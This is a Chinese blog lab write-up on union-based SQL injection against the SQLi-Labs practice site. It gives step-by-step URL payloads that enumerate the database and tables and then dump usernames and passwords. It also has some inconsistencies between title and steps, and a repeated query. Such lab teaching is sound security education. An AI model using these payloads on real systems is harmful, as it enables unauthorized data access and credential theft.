SOL注入-基于联合查询的数字型GET注入

最新推荐文章于 2023-08-10 16:47:30 发布
最新推荐文章于 2023-08-10 16:47:30 发布
阅读量267 收藏 2
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/omh164052427/article/details/123075172
版权

实验目的:

理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程

实验原理

数字型GET注入,其注入点存在于URL中的GET参数处,如
http://wwwtestweb.com/userphp?id=8,而服务器后端实际查询代码原型诸如:
"select ... from ...where id=$id…”。
攻击者可以通过构造恶意的GET输入参数,利用union select命令进行注入,暴露数据库中存储的信息。

实验步骤

本实验的目标是:以SQLi-Labs网站的Less-2为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs网站的登录用户名和密码。

1.访问SQLi-Labs网站

在攻击机Pentest-Atk打开FireFox浏览器,并访问靶机A-SQLi-Labs上的
SQLi-Labs网站Less-2。访问的URL为:

http://[靶机IP]/sqli-labs/Less-1/

 

根据网页提示,给GET定一个参数

http://[靶机IP]/sql/Less-1/?id=1

 

注:该实验中Firefox浏览器已经提前安装好HackBar插件,在上图的界面中右击鼠标,点击 检查 即可进入控制台,随后点击HackBar即可使用该插件 (部分机型按F12即可进入控制台)

2.寻找注入点

分别使用一下三条payload寻找注入点并判断注入点的类型

http://[靶机IP]/sql/Less-1/?id=1'

运行报错

 

 http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and '1'='1

运行后正常

 

http://靶机ip/sqli-labs-master/Less-1/?id=1' and '1'='2

运行后为正常显示

 

以上结果可以判断,网站存在字符型注入点

3 判断网站查询的字段数

尝试使用以下payload获取网站查询字段数(关键字order by)

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' order by 1--+

正常显示

 

 

 

 由上述结果可以判断,网站查询字段数为3

4 判断网站的回显位置

利用以下payload判断网站回显位置

http://(靶机ip)sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,3--+

执行结果是  2号位和三号位可以回显

 

 5 获取网站当前所在的数据库库名

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,database()--+

显示结果位security

 

 6 获取数据库security的全部表名

http://(靶机ip)sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+

显示结果中,有一个名为users的表,这当中可能存在网站用户的基本信息


 

 

7 获取users表的全部字段

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' and table_name='users'--+

 

8 获取users表id,username和password字段的全部值

由于users表中存放多组用户名和密码数据,而每一次只能显示一组数据名,我们通过limit M,N的方式逐条显示(1)显示第一组数据

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1 --+

显示结果位Dump,Dump。

 

(2)显示第二组数据

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1 --+

 

(3)显示第三组数据

http://(靶机ip)/sqli-labs-master/Less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1 --+
 

 

以此类推,可以通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来

实验总结

本次实验,成功实现了对存在字符型GET注入点的网站的手工SQL注入,掌握了基于联合查询的注入方法和流程。

omh164052427
关注
SQL注入测试-业务安全测试实操(10)
AI
06-16 592
SQL注入测试,测试原理和方法,测试过程,整改建议
Web安全防攻(渗透测试)
m0_62959521的博客
04-07 3217
第二章 2.1 在Linux系统安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序会有5...
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 662
实验原理 字符型GET注入,其注入点存在于URL的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的类型; http:/
SQL注入-基于联合查询数字型GET注入
weixin_46831054的博客
02-16 3623
实验原理 数字型GET注入,其注入点存在于URL的参数处。 攻击者可以通过构造恶意的get输入参数,利用union select命令进行注入,暴露数据库存储的信息。 实验一 步骤: 1.访问靶机网站:http://127.0.0.1:456/Less-2/ 登录后,根据网页,给出GET参数 ?id=1 显示出用户名:Dumb,密码:Dumb 注:该实验利用Firefox的插件:Hackbar。没有该插件可到搜索框里输入payload参数。 2.寻找注入点 http://127.0.0.1:456/L
SQL注入——基于联合查询的字符型GET注入(三)
Gjqhs的博客
02-16 770
本章目的 普及字符型GET注入的原理和特点,掌握利用联合查询(unionselect)的方法 实现SQL注入的基本流程。 实验环境 攻击机:Pentest-Atk (1)操作系统:Windows10 (2)安装的应用软件:Sqlmap、Burpsuite、FireFox浏览器插件Hackbar、 FoxyProxy等 (3)登录账号密码:操作系统帐号Administrator,密码Sangfor!7890 靶机:A-SQLi-Labs (1)操作系统:Centos7 (2)安装的应用软件:Apache、M
SQL注入——基于联合查询的POST注入
qq_52072846的博客
02-18 1175
实验目的: 理解数字型GET注入的原理和特点,掌握利用联合查询(union select)的方法实现SQL注入的基本流程 实验原理 POST注入,其注入点存在于POST表单的参数处。攻击者可以通过代理抓包 工具(如Burpsuite)拦截并修改POST表单的参数,利用union select命令进 行注入,暴露数据库存储的信息。 实验步骤 本实验的目标是:以SQLi-Labs网站的Less-11为入口,利用联合查询(union select)的方式实施SQL注入,获取SQLi-Labs.
SQL注入、XSS、XXE、CSRF、SSRF、越权漏洞、文件上传、文件包含总结篇
m0_57379855的博客
03-23 5735
漏洞总结篇SQL注入修复过滤特殊字符修改php.in使用mysqli_real_escape_string()函数加固数据库方面加固管理方面 SQL注入 是指web应用程序对用户输入的数据的合法性没有判断或者没有严格的过滤,攻击者可以在web程序把定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息 就是使用某种手段,在原来的SQL语句基础上,添加一段恶意的SQL语句并执行,从而达到不被管理员允许的目
渗透测试 2 --- XSS、CSRF、文件上传、文件包含、反序列化漏洞
墨鱼菜鸡
07-11 3205
1、渗透测试 实用 浏览器插件 chrome、edge 插件:搜索 cookie,安装 cookie editor,打开插件,可以 导出 cookie HackBar :Hackbar是网络安全学习者常备的工具 (https://www.fujieace.com/hacker/tools/hackbar.html )。 ​解决Firefox插件-H...
Web安全攻防 渗透测试实战指南3
jxy191021的博客
04-05 6276
第二章 2.1 在Linux系统安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程序会有5个选项,如下
注入SQL注入1
bwxzdjn的博客
03-18 1223
用实验案例的形式记录SQL注入按照注入点类型分类的三大基础注入形式:数字型注入、字符型注入和搜索型注入,采用手工注入的方法了解SQL注入的基本原理
网络安全——基于联合查询的字符型GET注入
weixin_54055099的博客
09-08 612
SQL注入之基于联合查询的字符GET注入
Sql注入实验(一)——字符型注入(GET)
DaydreamF的博客
04-13 1467
Sqli-libs Less1——字符型注入 URL:http://192.168.224.128/sqli/Less-1/ 一、手工注入 1…打开页面,如下所示: 2.根据提示,在url后输入参数id的值,页面显示: 说明,根据传入id参数值的不同,后台服务器查询的数据不同,展示在了前端界面。(参数可控) 3.尝试在参数值的后面输入特殊字符,看页面是否报出数据库语法错误: 报错语句: You have an error in your SQL syntax; check the manual t
网络信息安全实训【SQL注入
@MIKE小助手
06-17 787
🛢️SQL注入测试 ⭕实例代码,仅供测试⭕【1】搭建数据库基本环境 三、创建注册用户页面 【1】先进入网页的根目录 【2】创建网页文件 打开效果: 打开效果: 【1】插入数据前数据库验证 【2】开始创建两个可用于实验的数据 【3】再次查看数据库【4】尝试正常登录检查 【5】使用正常的账号密码进行登录测试打开登录页面开始注入非法字符实现原理:直接恶意注释原代码里面的数据库查询语句的查询密码这一项,导致密码验证直接失效实现无密码登录 这样就直接不需要密码就可以直接能够成功登录了。实现原理:直接.
SQL注入概述与GET注入实例
weixin_59872639的博客
02-18 1279
SQL注入概述 什么是SQL注入漏洞 攻击者利用Web应用程序对用户输入验证上的疏忽,在输入的数据包含对某些数据库系统有特殊意义的符号或命令,让攻击者有机会直接对后台数据库系统下达指令,进而实现对后台数据库乃至整个应用系统的入侵。 SQL注入原理 服务端没有过滤用户输入的恶意数据,直接把用户输入的数据当做SQL语句执行,从而影响数据库安全和平台安全。 两个条件 用户能够控制输入 原本程序要执行的SQL语句,拼接了用户输入的恶意数据 SQL注入过程 SQL注入危害 绕过
sql注入学习总结
hl1293348082的专栏
04-10 415
所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 测试数据库 我们本文就以如下数据库作为测试数据库,完成我们的注入分析。 相关函数 在学习盲注之前,首先要了解一下在sql盲注所涉及到的函数以及使用方法。 mid()---从文本字段提取字符 SELECT MID(column_name,start[,length]) FROM table_name; column_name 必需。要提取字符的字段。 s
SQL注入原理及实践(一)--SQL注入联合查询
dulirongdudu的博客
06-23 1323
SQL注入原理及实践(一)–SQL注入联合查询 1)判断注入类型 一般采用【1and1=2】去判断,当输入【1and1=2】时, 如果报错,则为数字型注入, 如果显示正常,则为字符型注入 原理如下: 假设数据库执行命令为:select * from table_name where id=$id $id为用户所控,当输入【1and1=2】时 如果该注入数字型,则将会显示如下: select * from table_name where id=1and1=2 该语句,id=1为真;1=2为假;an
SQL注入联合查询
JIAPINGZH的博客
06-01 313
当输入 and ‘1’='2时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='2'语法正确,但逻辑判断错误,所以返回正确。说明:当输入 and ‘1’='1时,后台执行 Sql 语句:select * from <表名> where id = '1' and '1'='1'语法正确,逻辑判断正确,所以返回正确。(如果未报错,不代表不存在 Sql 注入,因为有可能页面对单引号做了过滤,这时可以使用判断语句进行注入。页面运行正常,继续进行下一步。
SQL注入之路之一:联合注入
weixin_62715196的博客
08-10 738
简单介绍union联合注入的原理、常用数据库名,以及一次简单的手工联合注入流程
"55555"+"SOL注入"MD5值
最新发布
05-28
对于"55555"+"SOL注入"字符串的MD5值,我不清楚具体的数值,但是我可以向您介绍一下MD5算法和SOL注入攻击。 MD5算法是一种常用的哈希算法,它可以将任意长度的消息压缩成一个128位的摘要,而且是不可逆的。SOL注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值